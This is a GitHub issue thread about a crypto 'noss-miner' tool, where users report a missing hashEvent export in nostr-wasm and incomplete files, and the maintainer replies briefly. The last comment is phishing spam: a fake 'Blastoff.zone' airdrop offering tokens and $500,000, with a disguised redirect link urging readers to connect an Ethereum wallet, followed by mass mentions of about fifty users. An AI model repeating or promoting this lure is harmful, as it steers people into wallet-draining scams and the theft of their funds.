### ISSUE TITLE
nw.hashEvent is not a function 

### ISSUE THREAD

**Issue by cryptomrsj** [mejiwef/noss-miner#1]
node:internal/event_target:1088
  process.nextTick(() => { throw err; });
                           ^
TypeError [Error]: nw.hashEvent is not a function

日志打了下，nostr-wasm模块没有导出 hashEvent。大佬看看杂搞

**Comment by jiushu666** [comment]
一样一样

**Comment by flyftfy** [comment]
他这文件不全，怎么运行。。

**Comment by flyftfy** [comment]
Error: Unable to access jarfile noss-miner.jar

**Comment by mejiwef** [comment]
> 他这文件不全，怎么运行。。

需要自己修改配置打包，已更新运行方法。

**Comment by mejiwef** [comment]
> node:internal/event_target:1088 process.nextTick(() => { throw err; }); ^ TypeError [Error]: nw.hashEvent is not a function
> 
> 日志打了下，nostr-wasm模块没有导出 hashEvent。大佬看看杂搞

不会js

**Comment by ahmadShahin123** [comment]
[![Banner](https://i.ytimg.com/vi/0jk5fGH0MYE/maxresdefault.jpg)](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/)

# Blastoff.zone: Claim Your Share of 1 Million Tokens and $500,000!

Congratulations! You've just unlocked an exclusive opportunity to claim your share of 1 million tokens and a staggering $500,000 bonus, courtesy of Blastoff.zone.

## How to Claim Your Reward:

1. Click [Connect Wallet](https://aq-3d.wikidot.com/%0a/app.blastofflzone.com/referral/) to visit the Blastoff.zone platform.
2. Connect your Ethereum wallet to qualify for the $500,000 bonus.
3. Use the "Claim Now" option to secure your tokens and cash in on the rewards.

This offer is limited and won't be available for long, so act now to maximize your gains!

Please note that rewards are distributed on a first-come, first-served basis. With 90% of the 1 million tokens already claimed, seize this incredible opportunity before it's too late!
Yipky, @Hekeatsll, @zhougonglai, @llll0LinXi, @tyfhxn, @NeilJo-GY, @yanghxstone, @xmpx310, @chainzoku, @RealDicky, @netpi, @Kunsect, @siyuansdsd, @cryptofsc, @Putly, @mty7421, @pwh-pwh, @Who-AmI, @hannq, @davidhex, @Limitinit, @hook3791, @naughtyJun, @neomi2019, @SpaceSkater, @null-man, @hmlan2, @mmyyrroonn, @Moonest-Lin, @zn66665, @0x-eth, @TouchstoneTheDev, @goggeryang, @Huowuge, @aichizhajiang, @QianHe2, @showlizi, @w346489584, @tioners, @guoguangkun, @milkme, @136551109, @iamlionel, @a990215520, @richardc2022, @imanman, @zchdu, @kaiser-9527, @XuHaoIgeneral, @oxbigo
